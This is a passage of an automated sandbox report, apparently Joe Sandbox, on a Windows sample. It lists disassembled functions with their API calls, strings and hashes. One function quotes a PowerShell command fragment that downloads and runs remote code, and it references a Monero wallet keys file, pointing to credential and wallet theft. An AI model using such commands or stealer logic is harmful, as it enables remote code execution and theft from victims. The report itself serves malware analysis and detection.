                            • Opcode Fuzzy Hash: f29c49876981f0364de52d0d75a61d06598a330a13edb09a4c6648272eb3547b
                            • Instruction Fuzzy Hash: B13104B4A00218ABEB20CF54DC85BDDB7B4EB48704F5081D9EA09B7281D7706E899F99
                            Function 003583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
                            • wsprintfA.USER32 ref: 00358459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0035847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0035848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00358499
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,00FBDFE0,00000000,000F003F,?,00000400), ref: 003584EC
                            • lstrlen.KERNEL32(?), ref: 00358501
                            • RegQueryValueExA.ADVAPI32(00000000,00FBE070,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00360B34), ref: 00358599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00358608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0035861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 5dde142ce286f0815b4b5172cc5ed08670a44f0222056832b40ec3c8462ca479
                            • Instruction ID: 26ce0b269e35e1d2f8a6aca70e25c1df1f5741084f08d1fa83ef5b76b057e43a
                            • Opcode Fuzzy Hash: 5dde142ce286f0815b4b5172cc5ed08670a44f0222056832b40ec3c8462ca479
                            • Instruction Fuzzy Hash: 0D211D719002189BEB24DB54DC85FE9B7B8FB48701F00C5D9EA09A6150DF71AA89DFE4
                            Function 00357690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003576A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003576AB
                            • RegOpenKeyExA.ADVAPI32(80000002,00FAC5E8,00000000,00020119,00000000), ref: 003576DD
                            • RegQueryValueExA.ADVAPI32(00000000,00FBE028,00000000,00000000,?,000000FF), ref: 003576FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00357708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 9530759027cd0dab674001099f5b1f53eebca81e0df040991f431cfaf4428381
                            • Instruction ID: 36abd1045e1095e77d9ad8f28a5e2872a09a5cecefd765e79e11495b3271601a
                            • Opcode Fuzzy Hash: 9530759027cd0dab674001099f5b1f53eebca81e0df040991f431cfaf4428381
                            • Instruction Fuzzy Hash: FB014FB5A04204BBFB01DBE4EC49F6AB7BCEB58701F104455FE04E72A1E6749908AF61
                            Function 00357720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0035773B
                            • RegOpenKeyExA.ADVAPI32(80000002,00FAC5E8,00000000,00020119,003576B9), ref: 0035775B
                            • RegQueryValueExA.ADVAPI32(003576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0035777A
                            • RegCloseKey.ADVAPI32(003576B9), ref: 00357784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: b41a6062840ef8c461ef20ee3b6ffccc27b4107d788ee349a3904e28392aaf8e
                            • Instruction ID: 646d133466b63d659c529316b03f6276edb238f33e1f64e9b1c784a0c6c1cccc
                            • Opcode Fuzzy Hash: b41a6062840ef8c461ef20ee3b6ffccc27b4107d788ee349a3904e28392aaf8e
                            • Instruction Fuzzy Hash: 6E01FFB5A40308BBFB00DBE4DC4AFAEB7B8EB58701F104559FE05B7291DA745A049F61
                            Function 003592E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(:5,80000000,00000003,00000000,00000003,00000080,00000000,?,00353AEE,?), ref: 003592FC
                            • GetFileSizeEx.KERNEL32(000000FF,:5), ref: 00359319
                            • CloseHandle.KERNEL32(000000FF), ref: 00359327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :5$:5
                            • API String ID: 1378416451-989784648
                            • Opcode ID: a14b1eae711fc9596eea1b310c534e8c94085783a0d89232bdd5d6586a38e479
                            • Instruction ID: 7fb11afad48c1e78ad66bd5cc91ec50d5011fd5ea7ea1ab3ff5b630a82d2f361
                            • Opcode Fuzzy Hash: a14b1eae711fc9596eea1b310c534e8c94085783a0d89232bdd5d6586a38e479
                            • Instruction Fuzzy Hash: 07F08C38E00208FBEB10DBB0DC08F9E77B9EB58311F108255BA51A72D0E6709604AB40
                            Function 003499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                            • LocalFree.KERNEL32(0034148F), ref: 00349A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 4d11d4d0357823d2ab5efa644493c736a2c2bd30601dcd303e5806e0c1a6e87e
                            • Instruction ID: 3e49d0057a4146cdc5570851fe0a286c16b39f9ba38fce7fba9f1a6df771523a
                            • Opcode Fuzzy Hash: 4d11d4d0357823d2ab5efa644493c736a2c2bd30601dcd303e5806e0c1a6e87e
                            • Instruction Fuzzy Hash: 87314BB4A00209EFDB15CF94C885FAE77F9FF48300F108159E901AB290D778AA45DFA1
                            Function 00354780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,00FBE1A8), ref: 003547DB
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00354801
                            • lstrcat.KERNEL32(?,?), ref: 00354820
                            • lstrcat.KERNEL32(?,?), ref: 00354834
                            • lstrcat.KERNEL32(?,00FABB88), ref: 00354847
                            • lstrcat.KERNEL32(?,?), ref: 0035485B
                            • lstrcat.KERNEL32(?,00FBDC80), ref: 0035486F
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 00358D90: GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F
                              • Part of subcall function 00354570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00354580
                              • Part of subcall function 00354570: RtlAllocateHeap.NTDLL(00000000), ref: 00354587
                              • Part of subcall function 00354570: wsprintfA.USER32 ref: 003545A6
                              • Part of subcall function 00354570: FindFirstFileA.KERNEL32(?,?), ref: 003545BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: dfab7dab88762295ba5940909ecb7aeef30f3a3d70ed09576b52c25390e0f14c
                            • Instruction ID: 6d52ff76d37b53a67a2940aebf1bf5ec090f40a33e5bdfc5afd630c6b745e609
                            • Opcode Fuzzy Hash: dfab7dab88762295ba5940909ecb7aeef30f3a3d70ed09576b52c25390e0f14c
                            • Instruction Fuzzy Hash: C93184B290020857DB16FBB0DC85EED737CAB58701F404589BB15BA091EE74978DCFA1
                            Function 00352C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00352D85
                            Strings
                            • ')", xrefs: 00352CB3
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00352CC4
                            • <, xrefs: 00352D39
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00352D04
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: a503b41167eabcec084f419f77911b2b7f997a948487a2049dc469897329b8ef
                            • Instruction ID: fdafc9847205e704d93a3106addc794f2038b6092816a6062b4930509daa4656
                            • Opcode Fuzzy Hash: a503b41167eabcec084f419f77911b2b7f997a948487a2049dc469897329b8ef
                            • Instruction Fuzzy Hash: D641B271C106089ADB1AEBA0C892FDDBB74BF14301F404119E916BA1A5EF746A4EEF91
                            Function 00349E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00349F41
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: a43ebf237933e90fd5b27927101d8861a407174059ccec8c98d82a9840674c28
                            • Instruction ID: 1c768fd37a90edb81bc1f085ad5e195f7fe788891696038b1941b971aaed626d
                            • Opcode Fuzzy Hash: a43ebf237933e90fd5b27927101d8861a407174059ccec8c98d82a9840674c28
                            • Instruction Fuzzy Hash: 1B615070A10648EFDB25EFA4CC96FEE77B9AF44300F008118F90A5F195EB706A49DB52
                            Function 003540B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,00FBDD40,00000000,00020119,?), ref: 003540F4
                            • RegQueryValueExA.ADVAPI32(?,00FBE268,00000000,00000000,00000000,000000FF), ref: 00354118
                            • RegCloseKey.ADVAPI32(?), ref: 00354122
                            • lstrcat.KERNEL32(?,00000000), ref: 00354147
                            • lstrcat.KERNEL32(?,00FBE280), ref: 0035415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: b65a029a860e1c3caefa1cc27068e4cbd3341ba6a3ae39cf8d915cd442541485
                            • Instruction ID: 660817587544a4cfa4a1c82c69960a6a0fe0a2e9683cdc74fb0cf50b39effc6c
                            • Opcode Fuzzy Hash: b65a029a860e1c3caefa1cc27068e4cbd3341ba6a3ae39cf8d915cd442541485
                            • Instruction Fuzzy Hash: 8041CCB6D001086BEB15EBA0DC46FFD737DA798300F004559BF156B191EA755B8C8BD2
                            Function 00357E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00357E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,00FAC380,00000000,00020119,?), ref: 00357E5E
                            • RegQueryValueExA.ADVAPI32(?,00FBDB40,00000000,00000000,000000FF,000000FF), ref: 00357E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00357E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
